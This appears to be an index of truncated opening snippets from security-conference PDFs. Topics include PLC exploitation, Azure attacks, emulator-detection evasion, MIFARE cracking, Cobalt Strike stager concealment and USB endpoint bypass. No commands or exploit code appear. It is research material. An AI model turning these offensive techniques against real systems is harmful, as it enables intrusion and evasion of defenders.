/0 2^32 4,294,967,296 2^128 340,282,366,920,938,463,463,374,607,431,768,211,456 /1 2^31 2,147,483,648 2^127 170,141,183,460,469,231,731,687,303,715,884,105,728 /2 2^30 1,073,741,824 2^126 85,070,591,730,234,615,865,843,651,857,942,052,864 /3 2^29 536,870,912 2^125 42,535,295,865,117,307,932,921,825,928,971,026,432 /4 2...
pdf
新一代的恐怖袭击 基于树莓派的 渗透测试 锦龙信安(威客众测平台) 高级安全工程师 ——MXi4oyu 什么是树莓派 Raspberry  Pi(中文名为“树莓派”,简写为RPi,或者RasPi/RPi)是只有信 用卡 大小的微型计算机。 树莓派之父:埃本·阿普顿(Eben  Epton) 初心:能够在帮助小孩学习的同时,也能让他感受到在学习编程过程中的 愉悦感。 树莓派的特点 (1)可编程、可拓展(可编程控制GPIO口,可接各种传感器模块等) (2)可学习、可娱乐(集学习和娱乐于一身) (3)携带方便(一张标准的信用卡大小) (4)成本低(25美元) 主要版本 树莓派B 树莓派B+ 树莓派接线图 小试牛刀-­准备工作 (1)树莓派...
pdf
Exploit  PLC  on  the  internet Z-­‐0ne 概述 什么是PLC 为什么会联网 PLC • Programmable  Logic  Controller – 电源 – CPU – 存储 – I/O – 网络模块 PLC功能 • PLC功能 – 顺序控制 – 逻辑控制 • PLC应用 – 自动化控制 – 过程控制 其他 • PLC内核 – Codesys – ProConos • 底层操作系统 – Linux – Vxworks – WinCE • 通信协议 – 通用 • Modbus – 私有 • S7 • Omron  FINS PLC通信 • 串行 – RS232/...
pdf
fox-it.com Pwning your Azure environment Dirk-jan Mollema / @_dirkjan I’m in your cloud… - Lives in The Netherlands - Hacker / Red Teamer / Researcher @ Fox-IT since 2016 - Author of several Active Directory tools - Mitm6 - ldapdomaindump - BloodHound.py - aclpwn.py - Co-author of ntlmrelayx - One of the MSRC Most Valu...
pdf
Guess Where I am: Android模拟器躲避的检测与应对 胡文君(MindMac) 肖梓航(Claud Xiao) 模拟器检测技术 模拟器技术应用广泛 • Google、安全企业使用模拟器检测恶意代码 • 为什么用模拟器而不是真机? – 经济成本低 – 高度可定制 – 易于开发 – 容易部署 模拟器检测技术现状 • Timothy Vidas and Nicolas Christin, Evading Android Runtime Analysis via Sandbox Detection, ASIACCS’14 • 赵闽 and 倪超,逃离安卓动态检测&订票助手一日谈,HitCon 2013 • Tim S...
pdf
云影实验室 1 / 17 .NET 高级代码审计(第二课) Json.Net 反序列化漏洞 Ivan1ee@360 云影实验室 2019 年 03 月 01 日 云影实验室 2 / 17 0X00 前言 Newtonsoft.Json,这是一个开源的 Json.Net 库,官方地址: https://www.newtonsoft.com/json ,一个读写 Json 效率非常高的.Net 库,在做开 发的时候,很多数据交换都是以 json 格式传输的。而使用 Json 的时候,开发者很多时 候会涉及到几个序列化对象的使用:DataContractJsonSerializer, JavaScriptSerial...
pdf
MIFARE Classic: Completely Broken Chen-Mou Cheng Dept. Electrical Engineering National Taiwan University Introduction • MIFARE Classic – 0wned by NXP Semiconductors, Inc. – The most widely deployed RFID technology • Over 1 billion cards sold • Main uses – Public transportation ticketing systems – Access control systems...
pdf
An Anti-Mitigation Exploit Generation Integrating with Metasploit Framework Vince Chen Software Quality Laboratory, NCTU About me Vince Chen ● MS in Computer Science and Engineering of NCTU ● Software Quality Laboratory 2 About SQLab ● Advisor: Prof. Shih-Kun Huang ● Current members:  Ph.D student * 3  MS student...
pdf
Intercepting, modifying, and generating wireless signals with SDR Caleb Madrigal (Public) handle: metem Website: http://calebmadrigal.com/ Twitter: @caleb_madrigal Ham call sign: w0hak About Caleb: Programming for about 18 years. I most enjoy hacking and mathy stuff (Signal processing, Machine Learning, AI) In general...
pdf
Breaking SSL using time synchronisation attacks Jose Selvi, Senior Security Consultant • Jose%Selvi% • +10%years%working%in%security% • Senior%security%Consultant% • SANS%Institute%Community%Instructor% • GIAC%Security%Expert%(GSE)% • Twitter:%@JoseSelvi% • Blog:%http://www.pentester.es $ whois jselvi Valencia: Beach, ...
pdf
Bypassing Endpoint Security for $20 or Less Philip A. Polstra, Sr. @ppolstra ppolstra.blogspot.com • Why this talk? • Who is this dude talking at me? • Brief history of USB • How does USB work? • It’s all descriptors and endpoints • Bulk-only mass storage devices • Bypassing endpoint security • Microcontro...
pdf
技 术 标 准 研发运营一体化能力成熟度模型 第 2 部分:敏捷开发管理过程 The DevOps capability maturity model Part 2: Agile management process (征求意见稿) 2017 年 11 月 18 日 YDB XXXXX—XXXX I 目 次 目次!........................................................................................................................................!I 前言!...........
pdf
PE格式详解 概述 PE文件的全称为Portable Executable,是windows操作系统下可执行文件的一种文件格式,符合 COFF标准(Common Object File Format:https://en.wikipedia.org/wiki/COFF),除了我们常见的exe文 件,像windows下的动态链接库文件(.dll),内核驱动(.srv),控制面板文件(.cpl)等都属于PE文件。 PE文件是一种数据结构,里面包含了OS加载程序能够把它加载到内存中并运行的所需的信息。 结构预览 一个典型的PE结构如下图所示: 如果使用PEbear(https://github.com/hasherezade/pe...
pdf
Cyber-hijacking Airplanes: Truth or Fiction? Dr. Phil of Bloomsburg University @ppolstra http://philpolstra.com Captain Polly of University of <redacted> @CaptPolly Why This Talk? ● Lots of bold claims concerning the feasibility of cyber-hijacking ● Bold claims get lots of press ● Most people don't know enough to ev...
pdf
关于CobaltStrike的Stager被扫问题 随着CobaltStrike(下文简称CS)的广泛应用,各种检测脚本和空间测绘扫描系统都盯上了CS,作为夹 缝中求存的公鸡队(红队),不得不反击一波。 下面是检测的手法和相关文章,还不清楚的兄弟可以阅读下: https://github.com/whickey-r7/grab_beacon_config https://mp.weixin.qq.com/s/BLM8tM88x9oT4CjSiupE2A 这个检测手法其实不是什么秘密,我们看下代码 很清晰,很明白,我解释一下,就是请求stager的时候只要符合以上规则的url就可以成功请求到stager 的代码。 公鸡队的兄弟们,对抗...
pdf
Scanner Frequencies: Riviera Hotel and Casino Trunking System, Las Vegas, Nevada http://radioreference.com/modules.php?name=RR&sid=4413 1 of 2 6/18/2007 14:54 NOT LOGGED IN Home · Your Account · Forums · Database · Wiki · Submit Info Search RR Help Desk Riviera Hotel and Casino System US > Nevada > Clark C...
pdf
Please& Stand& by&this& talk& will& start& soon!& DEF CON 2018-13-05 Beijing, China From Dark Visitors to Valued Allies. You&may&have&seen&me&rob&a&bank&on&NatGeo&TV&show&Breakthrough&Season&2…& ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! !!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!...
pdf
Crypto for Hackers The Workshop Eijah v1.00 August 7th, 2015 Who am I? 3 • Founder • Programmer • Hacker Prerequisites • Laptop • Linux (gcc 4.7), Windows (MSVC 2013) • Crypto++ • www.cryptopp.com • Boost 1_58_0 • www.boost.org • Workshop Files • www.demonsaw.com • Qmake • www.qt.io • Optional to create your own Makefi...
pdf
1 2022 年中国网络安全行业 《API 安全产品及服务购买指南》 2022 年 9 月发布版 1 目录 前言 .................................................................................................................................................. 1 Akamai 阿卡迈 ...................................................................................................
pdf